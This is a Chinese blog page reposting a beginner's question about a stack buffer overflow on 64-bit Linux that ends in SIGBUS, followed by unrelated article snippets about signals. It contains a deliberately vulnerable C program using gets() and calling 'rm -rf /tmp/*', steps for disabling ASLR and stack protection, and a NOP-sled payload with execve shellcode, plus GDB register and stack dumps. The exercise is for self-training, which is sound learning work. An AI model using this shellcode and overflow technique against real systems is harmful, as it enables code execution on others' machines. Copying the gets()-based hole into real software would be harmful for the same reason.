linux c 修改缓冲方式,Linux:简单C程序的缓冲区溢出给SIGBUS

最新推荐文章于 2023-10-25 23:38:43 发布
最新推荐文章于 2023-10-25 23:38:43 发布
阅读量208 收藏
点赞数
文章标签: linux c 修改缓冲方式

我是二进制开发的初学者,我正在训练利用缓冲区溢出 . 我做了一个无用的短C程序:

#include

#include

int main(void) {

setbuf(stdout, NULL);

char buffer[64];

puts("\nWELCOME TO THE REMOTE TEMP CLEANER SERVICE\n");

printf("Please enter a password: ");

gets(buffer);

puts("\n");

if(strcmp(buffer, "securepassword1234") == 0) {

puts("[+] Password correct.");

puts("[*] Cleaning temp folder..");

system("/bin/rm -rf /tmp/*");

puts("[+] Done!");

puts("[*] Disconnecting...");

return 0;

} else {

puts("[-] Incorrect password.");

puts("[*] Disconnecting...");

return 1;

}

return 0;

}

出于培训目的,我正在尝试利用其中的缓冲区溢出漏洞 . 我做了 echo 0 > /proc/sys/kernel/randomize_via_space ,并使用 -fno-stack-protector 和 -z execstack 标志用gcc编译 .

我启动了gdb,经过一些研究尝试用这个输入运行程序

在另一个终端:

echo -n `python -c 'print("\x90"*45 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x42\x42\x42\x42\x42\x42")'` > input

(所以nopslide shellcode返回地址,现在只是6倍\ x42用于测试目的 . 我在http://shell-storm.org/shellcode/files/shellcode-806.php上找到了shellcode,我使用了这个,因为我在64位系统上)

在gdb上: r < input

它给了我这个结果:

Starting program: /root/remotetempclean < input

WELCOME TO THE REMOTE TEMP CLEANER SERVICE

Please enter a password:

[-] Incorrect password.

[*] Disconnecting...

Program received signal SIGSEGV, Segmentation fault.

0x0000424242424242 in ?? ()

(gdb)

(gdb)

(gdb)

(gdb)

(gdb) info register

rax 0x1 1

rbx 0x0 0

rcx 0x7ffff7b06134 140737348919604

rdx 0x7ffff7dd48c0 140737351862464

rsi 0x7ffff7dd37e3 140737351858147

rdi 0x0 0

rbp 0x50f3bb05e545752 0x50f3bb05e545752

rsp 0x7fffffffe1d0 0x7fffffffe1d0

r8 0x7ffff7fd14c0 140737353946304

r9 0x0 0

r10 0x88b 2187

r11 0x246 582

r12 0x5555555546e0 93824992233184

r13 0x7fffffffe2a0 140737488347808

r14 0x0 0

r15 0x0 0

rip 0x424242424242 0x424242424242

eflags 0x10202 [ IF RF ]

cs 0x33 51

ss 0x2b 43

ds 0x0 0

es 0x0 0

fs 0x0 0

---Type to continue, or q to quit---

gs 0x0 0

(gdb)

因此RIP寄存器已成功覆盖0x42字节 . 所以在那之后我检查了堆栈,在我的nopslide中搜索一个新的返回地址:

(gdb) x/50x $rsp-65

0x7fffffffe18f: 0x90909090 0x90909090 0x90909090 0x90909090

0x7fffffffe19f: 0x90909090 0x90909090 0x90909090 0xc0319090

0x7fffffffe1af: 0x9dd1bb48 0x8cd09196 0xf748ff97 0x5f5453db

0x7fffffffe1bf: 0x54575299 0x0f3bb05e 0x42424205 0x00424242

0x7fffffffe1cf: 0x00000000 0x00000000 0xffe2a800 0x007fffff

0x7fffffffe1df: 0x04000000 0x00000100 0x5547ea00 0x00555555

0x7fffffffe1ef: 0x00000000 0x00000000 0xdc57b600 0x7da82efc

0x7fffffffe1ff: 0x5546e040 0x00555555 0xffe2a000 0x007fffff

0x7fffffffe20f: 0x00000000 0x00000000 0x00000000 0x00000000

0x7fffffffe21f: 0xfc57b600 0x28fd7bae 0x2257b615 0x28edc399

0x7fffffffe22f: 0x00000015 0x00000000 0x00000000 0x00000000

0x7fffffffe23f: 0x00000000 0x00000000 0xffe2b800 0x007fffff

0x7fffffffe24f: 0xffe17000 0x007ffff7

所以这个 0x7fffffffe18f 地址看起来不错,它位于nopslide的中间 . 所以我将输入修改为:

echo -n `python -c 'print("\x90"*45 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x8f\xe1\xff\xff\xff\x7f")'` > input

所以现在我想我应该有一个shell,但是当我运行程序时...

(gdb) r < input

Starting program: /root/remotetempclean < input

WELCOME TO THE REMOTE TEMP CLEANER SERVICE

Please enter a password:

[-] Incorrect password.

[*] Disconnecting...

Program received signal SIGBUS, Bus error.

0x00007fffffffe1c0 in ?? ()

(gdb) info registers

rax 0x0 0

rbx 0x68732f6e69622f 29400045130965551

rcx 0x7ffff7b06134 140737348919604

rdx 0x0 0

rsi 0x7ffff7dd37e3 140737351858147

rdi 0x7fffffffe1c8 140737488347592

rbp 0x50f3bb05e545752 0x50f3bb05e545752

rsp 0x7fffffffe1c8 0x7fffffffe1c8

r8 0x7ffff7fd14c0 140737353946304

r9 0x0 0

r10 0x88b 2187

r11 0x246 582

r12 0x5555555546e0 93824992233184

r13 0x7fffffffe2a0 140737488347808

r14 0x0 0

r15 0x0 0

rip 0x7fffffffe1c0 0x7fffffffe1c0

eflags 0x10213 [ CF AF IF RF ]

cs 0x33 51

ss 0x2b 43

ds 0x0 0

es 0x0 0

fs 0x0 0

---Type to continue, or q to quit---

gs 0x0 0

(gdb)

RIP已"magically"转为 0x7fffffffe1c0 ?它给了一个SIGBUS,我无法理解为什么......我做错了什么?

朱炫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
X86 LinuxSIGBUS 总结
weixin_34279061的博客
06-05 798
SIGBUS 在 x86 Linux 上并不多见,但一旦出现,其调用堆栈常常让人摸不着头脑,加之信号问题各平台系统间差异较大,更让人难以理清,这里稍微总结一下 x86 Linux 上大概有哪些情形会触发 BUS ERROR. 文件映射访问异常 这是 SIGBUS 在用户态最为常见的场景,也最容易触发,通常来说根本原因都是进程 mmap 了一个文件后,另外的进程把这个文件截断了,导致 mmap 出来...
Linux 程序、进程和线程
weixin_50866517的博客
05-15 2659
程序、进程和线程一、程序、进程和线程的概念程序和进程的差别Linux环境下的进程进程和线程二、进程产生的方式进程号进程复制fork()函数system()函数方式进程执行exec()函数系列所有用户态进程的产生进程init三、进程间通信和同步半双工管道命名管道消息队列消息队列的一个例子信号量共享内存信号四、 Linux下的线程多线程编程实例Linux下线程创建函数pthread_create()线程的结束函数pthread_join()和函数pthread_exit()线程的属性线程间的互斥线程中使用信号量
【6】 缓冲区溢出 一个字节溢出 指针修改内存
如梦如幻的博客
04-29 1528
在foo函数之中多了一个指针变量p与一个常量a,并且在执行完nstrcpy()函数之后,执行了*p=a的语句,而p与a的位置与ebp的相对关系不变,所以这就给了我们修改任意地址任意值的可能性(有效地址),而在之后通过跟踪_exit()函数,知道它利用jmp指令去跳到一个指针中存放的地址,故而通过修改其jmp的指针中的地址,最终直接jmp到了payload执行shellcode
linux信号之SIGBUS,SIGEMT,SIGFPE,SIGILL等
D&T的博客
08-03 3841
SIGBUS 指示一个实现定义的硬件故障。 SIGEMT 指示一个实现定义的硬件故障 SIGFPE 此信号表示一个算术运算异常,例如除以0,浮点溢出等。 SIGILL 此信号指示进程已执行一条非法硬件指令。 SIGINFO 这是一种4 . 3 + B S D信号,当用户按状态键(一般采用C t r l - T)时,终端驱动程 序产生此信号并送至前台进程组中的每一个进程。此信号通常造成在终端上显示前 台进程组中各进程的状态信息。 SIGINT 当用户按中断键(一般采用D E L E T..
Linux- 由映射文件I/O问题引出的SIGBUS & 空洞文件(Sparse File)
最新发布
青衫客36的博客
10-25 518
SIGBUS是一个在Unix-like操作系统中的信号,它通常表示非法访问内存,而这种非法访问的原因与常见的SIGSEGV(段错误)有所不同。以下是可能导致SIGBUS:某些硬件平台要求数据(如整数或浮点数)在内存中以特定的地址对齐(如2或4的倍数)。如果程序试图在这些平台上访问未对齐的数据,就可能收到SIGBUS。:使用mmap()系统调用映射文件到内存并尝试访问文件后面的内容可能会产生SIGBUS。例如,如果文件在被映射后被截断,那么当程序尝试访问被截断部分的数据时,就会得到SIGBUS
Linux的Signal及Singal处理(SIGQUIT SIGKILL SIGBUS等)
zz460833359的博客
10-26 2129
Linux的Signal及Singal处理(SIGQUIT SIGKILL SIGBUS等) 关于 在Linux应用程序调试中,应用程序异常退出,或收到若干信号后程序退出,该如何排错呢?本文尝试提供一点思路.【Linux应用程序调试系列说明】,专注于Linux应用程序的如何调试及部分调试技巧。为写商业应用程序时出现调试问题,提供一点思路。 工具箱 1 kill命令 kill命令可以用来杀死一个应用程序。在Linux应用程序调试时一个特别用法是:用指定信号杀死应用程序,然后分析死亡原因。去个例子,你
【C/C++】C语言signal信号|软中断信号|程序捕获Ctrl+C 信号
小鱼菜鸟的博客
08-13 822
目录 程序捕获Ctrl+C 信号 软中断信号 signal(SIGCHLD, SIG_IGN) SIGCHLD信号 SIG_ING 使用signal(SIGCHLD, SIG_IGN)处理僵尸进程 程序捕获Ctrl+C 信号 在Linux下面写一个程序,如果程序中出现死循环的话,我们就应该在键盘上按Ctrl+C来...
Linux多进程详解(进程间通信)
qq_43710269的博客
06-09 2870
Linux多进程详解,并行并发,fork,exec,进程间通信,匿名管道通信,有名管道通信,内存映射,共享内存通信,信号通信,信号集
Linux查看系统性能命令
weixin_48693408的博客
09-01 1231
linux查看系统性能命令,查看CPU、磁盘、网络、内存等信息
Linux C
弗里曼的小伙伴
01-14 1975
Linux C 2014年3月10日 1  编译和链接 1.1 流程 源程序-》预编译-》编译-》链接-》完成 1)       源程序:书写源程序代码 2)       预编译:宏指令处理,生成编译源程序(-E) 3)       编译:将源程序汇编(-S),然后编译生成目标程序(二进制)(-c) 4)       链接:将目标程序中的库函数链接实体,生成二进制。如果使用的是静
Linux 信号
weixin_33991727的博客
01-07 113
SIGSEGV与SIGBUS SIGBUS(Bus error)意味着指针所对应的地址是有效地址,但总线不能正常使用该指针。通常是未对齐的数据访问所致。 SIGSEGV(Segment fault)意味着指针所对应的地址是无效地址,没有物理内存对应该地址。 SEGV_MAPERR, 地址没有映射到对象,可能的原因是dangling pointer或者overflow, 比如 1. ptr...
linux SIGSEGV and SIGBUS
fanbird2008的专栏
02-21 1187
http://blog.csdn.net/hpwzd/article/details/6434231 涉及共享内存的管理就不能不提到访问共享内存对象。谈到访问共享内存对象就要留神“SIGSEGV和SIGBUS”这两个信号。 系统分配内存页来承载内存映射区,由于内存页大小是固定的,所以存在多余的页空间空闲,比如待映射文件大小为5000 bytes,内存映射区大小也为5000 bytes。而一
Linux C/C++ 对于SIGBUS、SIGSEGV等崩溃异常捕获实现
liulilittle的博客
01-28 5610
前段时间我们发表过类似得 Try-Catch 实现,但是该实现本身是存在局限性的,因为它们不能无视 SIGSEGV,SIGSYS,SIGTRAP等崩溃信号,对于某些3RD代码根本无法处理(这些代码没有源代码只有库,总不可能去静态反编译在改汇编)或者是短时间无法解决得内存BUG、例如毫无问题得代码在ARM平台会发生结构内存对齐问题(SIGBUS)导致强行崩溃(仅限于恶意崩溃,即运行相同代码+结构上万次以后才会发生SIGBUS提示内存对齐故障)别认为不可能,这在ARM上面存在潜在发生得可能性,解决办法查汇编查代
linux c 内存溢出,操作堆外内存溢出
weixin_33248912的博客
04-30 119
DirectMemory容量可通过-XX:MaxDirectMemorySize指定,如果不指定,则默认与JAVA堆的最大值(-Xmx指定)一样。以下代码越过了DirectByteBuffer类,直接通过反射获取Unsafe实例并进行内存分配(Unsafe类的getUnsafe()方法限制类只有引导类加载器才会返回实例,也就是设计者希望只有rt.jar中的类才能使用Unsafe的功能)。因为,虽然...
关于SIGBUS的总结
热门推荐
CodeJoker的专栏
09-11 6万+
From: by scz , 2.0 理解SIGBUS与SIGSEGVQ: SIGSEGV我能理解,但有时碰上SIGBUS,这该如何理解。A: nkwht@SMTHnkwht用Google获取这样一些知识。有多种可能导致SIGBUS信号:1) 硬件故障,不用说,程序员最常碰上的肯定不是这种情形。2) Linux平台上执行malloc(),如果
Program received signal SIGBUS, Bus error
iteye_13558的博客
01-19 5491
理解SIGBUS与SIGSEGV Q: SIGSEGV我能理解,但有时碰上SIGBUS,这该如何理解。 A: nkwht@SMTH nkwht用Google获取这样一些知识。有多种可能导致SIGBUS信号: 1) 硬件故障,不用说,程序员最常碰上的肯定不是这种情形。 2) Linux平台上执行malloc(),如果没有足够的RAM,Linux不是让malloc()失败...
linux c 内存压力大 栈溢出,linux栈溢出学习笔记
weixin_39863759的博客
04-30 275
gdb使用gdb GNU Project Debugger在linux下面调试程序必然会用到gdb,当然还有gdb的一个插件也是必须,那就是pedapeda增强了gdb的功能,在调试过程中会显示反汇编的代码、寄存器、内存信息等aslr – 显示和设置GDB的aslrchecksec – 显示多种安全机制的开关dumpargs – 当停到一个call 指令的时候,显示传递给函数的参数dumpprop...
Linux程序调试--Bus Error
cjsycyl的专栏
11-01 2万+
http://blog.csdn.net/zhaoyuping/article/details/8931662 Linux程序调试--Bus Error Bus Error究竟是指什么 一  Bus Error,即总线错误。    引发原因:    CPU出于性能方面的考虑,要求对数据进行访问时都必须是地址对齐的。如果发现进行的不是地址对齐的访问,就会发送SIGBUS
linux 内核环形缓冲区,环形缓冲
weixin_34040270的博客
05-12 1018
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?万丈高楼平地起的前提是地基好.环形缓冲区介绍圆形缓冲区(circular buffer),也称作圆形队列(circular queue),循环缓冲区(cyclic buffer),环形缓冲区(ring buffer),是一种数据结构用于表示一个固定尺寸、头尾相连的缓冲区,适合缓存数据流。用法圆形缓冲区的一个有用特性是:当...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值